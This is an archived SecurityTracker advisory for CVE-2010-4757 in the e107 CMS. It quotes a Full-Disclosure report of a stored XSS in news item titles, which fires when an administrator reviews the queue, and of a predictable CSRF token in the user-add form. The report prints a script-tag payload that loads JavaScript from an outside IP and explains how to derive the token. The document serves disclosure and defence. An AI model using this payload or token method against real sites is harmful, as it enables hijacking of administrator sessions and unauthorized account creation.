SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   e107 website system Vendors:   e107.org
e107 Input Validation Hole in News Item Title Field Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1024351
SecurityTracker URL:  http://securitytracker.com/id/1024351
CVE Reference:   CVE-2010-4757   (Links to External Site)
Updated:  Mar 17 2011
Original Entry Date:  Aug 23 2010
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.7.22; possibly other versions
Description:   A vulnerability was reported in e107. A remote user can conduct cross-site scripting attacks. A remote user can conduct cross-site request forgery attacks.

The software does not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the e107 software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Specially crafted news item titles are affected when displayed for review (e107_admin/newspost.php?sn) by the target administrator.

A remote user can also determine the appropriate token to be used in the user add form (e107_admin/users.php?create) to conduct cross-site request forgery attacks.

Justin Klein Keane reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the e107 website system software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can conduct cross-site request forgery attacks.

Solution:   The vendor has issued a fix (0.7.23).
Vendor URL:  www.e107.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] e107 CMS Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability Report

Details of this report may also be found at
 http://www.madirish.net/?article=471

Description of Vulnerability:
- -----------------------------
e107 (http://e107.org) is a PHP/MySQL based content management system.
e107 allows anonymous users to submit news items for display on the
front page.  These items enter a queue for review by admins and are
subsequently approved or rejected.

e107 suffers from cross site scripting (XSS) vulnerabilities because it
fails to properly sanitize user supplied input when rendering submitted
news item titles for administrative review.  Malicious users can submit
news at the default submitnews.php URL.  e107 sanitizes single quotes to
prevent against SQL injection but does not alter double quotes or HTML
tags.  An attacker could embed a piece of JavaScript, such as '<script
type="text/javascript" src="http://172.16.46.129/xsrf.js"/>' before or
after their title and this script would execute silently when an
administrator viewed the approval queue at e107_admin/newspost.php?sn.

e107 suffers from a cross site request forgery (XSRF) vulnerability
because it fails to use a difficult to discover random token in the user
add form located at e107_admin/users.php?create.  The token is carried
in a hidden form field 'ac' and is derived from the MD5 hash of the
administrative user accounts create date.  When the administrative
account is created the unix timestamp is stored in the MySQL database in
the e107_user.user_pwchange column.  Because logged in users can view
the 'Joined' state of the admin user at /user.php?id.1 it is easy to
derive the unix timestamp for the creation date of the account.

Systems affected:
- -----------------
e107 0.7.22 was tested and shown to be vulnerable

Impact
- ------
Unauthenticated users can exploit these vulnerabilities to attack other
users, potentially compromising the e107 service or host.

Vendor Response:
- ----------------
Upgrade to the latest version of e107 in order to mitigate these
vulnerabilities.

- -- 
Justin Klein Keane
http://www.MadIrish.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/

iPwEAQECAAYFAkxxiLUACgkQkSlsbLsN1gDlkAb9HoifQyrWmq6AvC/HygIRuZ22
Zf4RGGxG1fiNGef3n7rVdMIGYSzKxpQh4s+Ro3SqJkuwf9dtdPOVRZ50vF95qzUI
2Wk1h6Y3PwFSXLZRM/sclA2i31xe+Sum0Q1QTI1zzOwxia0FQ54b5bNLb4eT44mP
FDVcYqde1zPpKWXQgloJySi+Z2HgxGafUdJYwS4ih/pmGaqi1dFyo5ljBqgLbepY
KGjovP+fY9naN+b8HklhqT4nHdkte/73rb7SFOQHSkmfxe6E+Rp251fBROlp9xLz
RvPfsl18Nva6GFoz/Iw=
=mPwD
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC